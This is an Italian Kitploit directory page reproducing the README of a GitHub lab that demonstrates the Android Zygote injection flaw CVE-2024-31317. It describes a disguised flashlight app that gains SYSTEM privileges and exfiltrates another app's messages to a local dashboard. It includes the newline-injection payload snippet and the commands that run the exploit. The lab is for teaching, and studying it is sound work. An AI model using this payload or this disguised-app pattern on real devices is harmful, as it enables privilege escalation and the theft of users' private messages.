Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ZygoteExploitDemo — Dimostrazione educativa della vulnerabilità di iniezione Zygote CVE-2024-31317 su Android | Kitploit
Strumenti/GitHubGitHub/gitamans/zygoteexploitdemo
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPentesting di App MobiliPenetration TestingSicurezza MobileApprendimento e FormazioneBinary ExploitationLab e Pratica
GitHubgitamans/zygoteexploitdemo
225 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ZygoteExploitDemo

Dimostrazione educativa della vulnerabilità di iniezione Zygote CVE-2024-31317 su Android

Vedi Repository

🔥 ZygoteExploitDemo - Laboratorio di Sicurezza Android CVE-2024-31317

🚨 Dimostrazione Didattica della Vulnerabilità di Iniezione Zygote su Android

GitHub stars GitHub forks GitHub license


📋 Panoramica

Questo laboratorio dimostra CVE-2024-31317, una vulnerabilità critica di Android che consente a un'app malevola di elevare i privilegi al livello SYSTEM (UID 1000) e di bypassare la sandbox di Android per leggere i dati di altre applicazioni in tempo reale.

🎯 Cosa Mostra Questa Demo


🏗️ Struttura del Progetto

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/           # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/          # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/                # Flask web dashboard
│   └── app.py                   # Shows stolen messages live
│
├── 📜 scripts/                  # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # Code templates
    ├── exploit_template.java
    └── dashboard_template.html

🔧 Dettagli Tecnici

La Vulnerabilità

CVE-2024-31317 risiede nel modo in cui il processo Zygote di Android gestisce l'impostazione di sistema hidden_api_blacklist_exemptions. A causa della mancata sanitizzazione dell'input, un attaccante può iniettare caratteri di nuova riga per aggiungere argomenti arbitrari ai comandi Zygote.

Vettore di Attacco:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);

Versioni Interessate

VersioneStato
Android 9 - 14❌ Vulnerabile (prima della patch di giugno 2024)
Android 14+✅ Patch applicata (security update di giugno 2024)
Android 15+✅ Sicura

🚀 Guida all'Avvio Rapido

Prerequisiti

  • ✅ Android Studio (ultima versione)
  • ✅ Python 3.8+ con Flask
  • ✅ Android SDK con platform tools
  • ✅ 10GB di spazio libero su disco per l'emulatore

Passo 1: Clona il Repository

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

Passo 2: Configura l'Emulatore Vulnerabile

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12

Passo 3: Compila e Installa le App

root@kitploit:~
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

Passo 4: Avvia la Dashboard

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 Apri http://localhost:5000 nel tuo browser

Passo 5: Esegui l'Exploit

root@kitploit:~
cd ../scripts
python3 run_exploit.py

Passo 6: Guarda la Magia ✨

  1. Apri l'app SecureChat nell'emulatore
  2. Invia alcuni messaggi di prova
  3. Guardali apparire sulla dashboard istantaneamente! 🔴

📸 Video Dimostrativo

🎬 Video demo in arrivo


🔬 Come Funziona - Passo per Passo

  1. FlashlightPro richiede il permesso WRITE_SECURE_SETTINGS
  2. Il codice dell'exploit inietta il payload malevolo nelle impostazioni di Zygote
  3. Zygote genera MonitorService con privilegi SYSTEM (UID 1000)
  4. Il servizio SYSTEM bypassa le restrizioni della sandbox di Android
  5. Lettura diretta del database da /data/data/com.securechat/databases/
  6. Esfiltrazione verso la dashboard Flask tramite HTTP POST
  7. Visualizzazione in tempo reale dei messaggi crittografati rubati

📚 Risorse di Apprendimento

  • Bollettini sulla Sicurezza Android
  • Dettagli CVE-2024-31317
  • PoC originale di CleoV2

🤝 Contributi

I contributi sono benvenuti! Per favore:

  1. Fai il fork del repository
  2. Crea un branch di feature
  3. Invia una Pull Request

Aree di contributo:

  • 🎯 Payload di exploit aggiuntivi
  • 🛡️ Metodi di rilevamento migliori
  • 📖 Documentazione migliorata
  • 🌍 Traduzione in altre lingue

📄 Licenza

Licenza MIT - Vedi il file LICENSE per i dettagli


👨‍💻 Autore

Aman - @GitAmanS


⭐ Supporto

Se hai trovato questo progetto educativo, lascia una stella! ⭐


Creato per ricercatori di sicurezza, da un ricercatore di sicurezza

Ricorda: Da grandi poteri derivano grandi responsabilità 🕷️

Scarica lo strumento
FaseDescrizioneVisivo
1L'utente installa l'app "Flashlight Pro" dall'aspetto innocente🔦
2L'app sfrutta CVE-2024-31317 per ottenere accesso SYSTEM💉
3Il servizio a livello SYSTEM legge i messaggi di "SecureChat"👁️
4I messaggi rubati appaiono sulla dashboard in tempo reale📊